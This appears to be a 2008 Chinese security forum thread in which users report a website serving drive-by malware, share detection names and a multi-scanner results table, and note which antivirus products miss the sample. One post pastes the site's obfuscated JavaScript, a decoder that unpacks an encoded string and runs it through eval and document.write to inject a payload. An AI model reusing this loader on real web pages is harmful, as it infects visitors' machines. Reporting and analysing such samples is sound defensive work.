一个挂马网站 hxxp://www.aviews.net/

lanvin

hxxp://www.aviews.net/

ie直接卡死
附样本




附我的实验室手册，具体在签名档里有
中文：
英文：
欢迎大家光临指正

zwl2828

2008/6/21 10:34:23        http://bbs.kafan.cn/attachment.p ... 15611//2993gitkkyia[1].exe//PE_Patch.UPX//UPX        Internet Download Manager (IDM)        Detected: Rootkit.Win32.Podnuha.du

小邪邪

yk1234

Tr/Dropper.Gen
才重装系统没两天，那网站不敢上了。

qigang

地址：http://195.93.219.105/tds/?id=1

<script language=JavaScript>function f1(sed){l=sed.length;var st1=12,b=1024,i,j,r,p=0,s=0,st2="ss",w=0,t=Array(63,2,16,11,38,54,21,45,29,1,0,0,0,0,0,0,55,34,14,33,39,53,10,28,62,22,35,36,7,49,31,6,17,24,51,41,42,4,18,47,26,13,48,0,0,0,0,40,0,52,12,57,19,59,32,58,5,25,56,60,20,44,43,15,27,46,9,30,50,61,0,37,3,23,8);soot=sed;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)-48];sttp=saam<<s;w|=sttp;if(s){kek0=165^w;keke=kek0&255;kiki=keke;r=r+String.fromCharCode(kiki);s-=2;w=w>>8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dd4="f1";dd3=dd4+'("i5sk_DsC8JGt3puDmxH4iOoeMDBjpIQ4FOoeMDBjp4iefdsjp4SuMRNgfyQaGyYZQFQav@8aFXmEI3j4mxsHNXGtbxktPpBM6p8CsNbZYdkabnkEN1uEr@_C9xkZUx8tPp_MrRbZ3L7MUy7EbA84FXNkkDBjp4SA7xBcCWi4DnsjkWcnitBjNXGtbxktPpBM6p8CmLB4LTmc4NQCFqiCW4SEONYR6L8Crdkt1xYM1xb4LHBMddmuONYR6LuCpHgaUN8CMJcC_RmMynmEFoGahtHtPxkE3xGah1s@6DmtyxkELgiCboGCYqbMdRmZUL7tyWzM6yugUJbZQAikbI_@WIQkQszALgiCddkEhtB43dkab3bMPnkE3VGE6ooZypYRFWmDhBYMyyQuQqbMdRmZUL7tyWQErdGaxnkEzeiCddkEh1B4PgiCWIQkQs_kbWmwys_DhtkZh5Qu3XYZUN7MY@QkbVz4zVrJhgunhIzRxyQJmWzR3LbZ8nHZYF_kbWGCG58CPqzD1tzCQAzwbIzjQVSDhtkZh5ze3tkt9xG@ToGJ1TmaIyzD8FzJUArAltQCfJrwsIzRxyQJmWzR3LbZ8nHZYF_tVp8CG1SfbVz4zVrJh1B4lgiCboGCYtHAbWGZv@7gx@_fF37Ehqskh1cAlFzJUArAltQCfJiKsIzRxyQJmWzR3LbZ8nHZYF_tVp8CnLNCPFzJUArAltQCfJcwsIzRxyQJmWzR3LbZ8nHZYF_tVp8CnLNC2qQw1tzCQAzwbIzjQXSDhIzRxyQJmWzR3LbZ8nHZYF_tVp8CnLNC2qjw1tzCQAzwbIzjQ1SDWIQCboGCY1H4ltQCrnmMULYRFWkAYNYZxJcCFToRFRYtIdG@FnjwGtSwP3mE6RkaO@uAYLYtLgcnhAunQ0X4FX7MyRGEPWi4FsqgCR04iTQeMJsgpHXChHF")';eval(dd3);</script>


先需要JavaScript解密。

qigang

RS20.49.42未杀！

onesagain

卡巴貌似没反应阿！

qigang

分析报告：http://www.threatexpert.com/repo ... c883e8697826af0661e

chima287

我用红伞同NOD32两个杀软检测.红伞就能检出是病毒.

lanvin

AhnLab-V3 2008.6.19.0 2008.06.20 -
AntiVir 7.8.0.59 2008.06.20 TR/Dropper.Gen
Authentium 5.1.0.4 2008.06.20 W32/Agent.BK.gen!Eldorado
Avast 4.8.1195.0 2008.06.20 -
AVG 7.5.0.516 2008.06.20 Rootkit-Agent.C
BitDefender 7.2 2008.06.21 Trojan.Boaxxe.D
CAT-QuickHeal 9.50 2008.06.20 Rootkit.Podnuha.du
ClamAV 0.93.1 2008.06.21 -
DrWeb 4.44.0.09170 2008.06.20 Trojan.PWS.Tanspy.1325
eSafe 7.0.15.0 2008.06.19 Rootkit.Win32.Podnuh
eTrust-Vet 31.6.5892 2008.06.21 -
Ewido 4.0 2008.06.20 Rootkit.Podnuha.du
F-Prot 4.4.4.56 2008.06.20 W32/Agent.BK.gen!Eldorado
F-Secure 7.60.13501.0 2008.06.20 Rootkit.Win32.Podnuha.du
Fortinet 3.14.0.0 2008.06.20 W32/Dropper.AC!tr.rkit
GData 2.0.7306.1023 2008.06.21 Rootkit.Win32.Podnuha.du
Ikarus T3.1.1.26.0 2008.06.21 Trojan-Spy.BZub.NHN
Kaspersky 7.0.0.125 2008.06.21 Rootkit.Win32.Podnuha.du
McAfee 5322 2008.06.20 -
Microsoft None 2008.06.21 -
NOD32v2 3204 2008.06.20 -
Norman 5.80.02 2008.06.20 -
Panda 9.0.0.4 2008.06.20 -
Prevx1 V2 2008.06.21 -
Rising 20.49.42.00 2008.06.20 -
Sophos 4.30.0 2008.06.21 Mal/Dropper-AC
Sunbelt 3.0.1153.1 2008.06.15 Rootkit.Win32.Podnuha.du
Symantec 10 2008.06.21 -
TheHacker 6.2.92.356 2008.06.20 Trojan/Podnuha.du
TrendMicro 8.700.0.1004 2008.06.20 PAK_Generic.001
VBA32 3.12.6.7 2008.06.19 Rootkit.Win32.Podnuha.du
VirusBuster 4.3.26:9 2008.06.12 Rootkit.DR.Podnuha.Gen
Webwasher-Gateway 6.6.2 2008.06.21 Trojan.Dropper.Gen